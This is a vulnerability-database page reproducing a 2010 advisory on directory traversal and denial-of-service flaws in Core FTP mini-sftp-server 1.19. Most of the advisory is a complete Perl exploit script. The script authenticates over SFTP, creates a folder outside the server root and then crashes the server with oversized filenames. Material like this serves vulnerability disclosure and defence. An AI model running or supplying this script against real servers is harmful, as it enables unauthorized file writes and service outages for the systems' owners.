Vulners
Lucene search
Core FTP mini-sftp-server 1.19 Denial Of Service / Traversal
`Date of Discovery:
7-Jun-2010
Credits:
leinakesi[at]gmail.com
Vendor:
Core FTP mini-sftp-server
http://www.coreftp.com/server/index.html
Affected:
Core FTP mini-sftp-server version 1.19.
Earlier versions may also be affected.
Overview:
"Core FTP Server" and "Core FTP mini-core sftp server" are both products of Core FTP that allow you to exchange files with others via networks and the internet. I have tested the SFTP module of "Core FTP Server" before and found there are several Denial of Service and Directory Traversal vulnerabilities. It seems "Core FTP mini-core sftp server" has behaved the same way as Core FTP Server does--They have the same vulnerabilities.
1. Directory Traversal vulnerability:
$m = $sftp->mkdir("../A/");# create a folder outside the root directory
2. Denial of Service vulnerability:
$o1 = $sftp->open("A" x 10000);
$o2 = $sftp->open("test", "O_RDWR", "A" x 10000);
$o3 = $sftp->open("test", $FUZZ, 0666); $o3 = $sftp->open("test", $FUZZ, 0666);
$st = $sftp->stat("A" x 10000);
PS: thanks to Jeremy Brown, I learned a lot from his blog.^_^
Exploit example:
#!/usr/bin/perl
#leinakesi[at]gmail.com
#thanks to Jeremy Brown, I learned a lot from his blog.^_^
#the script will first make a folder "A" outside the root directory and then crash the server.
use Net::SSH2;
use Getopt::Std;
$FUZZ = "A" x 10000;
getopts('S:P:u:p:', \%opts);
$server = $opts{'S'}; $port = $opts{'P'}; $user = $opts{'u'}; $pass = $opts{'p'};
if(!defined($server) || !defined($port) || !defined($user) || !defined($pass) )
{
print "usage:\n\tperl test.pl -S [IP] -P [port] -u [user] -p [password]\nexample:\n";
print "\tperl test.pl -S 192.168.48.114 -P 22 -u chloe -p 111111\n";
exit(0);
}
$ssh2 = Net::SSH2->new();
$ssh2->connect($server, $port) || die "can not connect the server, please check.\n";
$ssh2->auth_password($user, $pass) || die "you sure user name and password are correct?\n";
$sftp = $ssh2->sftp();
#make a folder outside the root directory
$m = $sftp->mkdir("../A/");
#any command of the following would cause Core FTP mini-sftp-server crash.
$o1 = $sftp->open($FUZZ);
#$o2 = $sftp->open("test", "O_RDWR", $FUZZ);
#$o3 = $sftp->open("test", $FUZZ, 0666);$o3 = $sftp->open("test", $FUZZ, 0666);
#$st = $sftp->stat($FUZZ);
$ssh2->disconnect();
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Jun 2010 00:00Current
0.1Low risk
Vulners AI Score0.1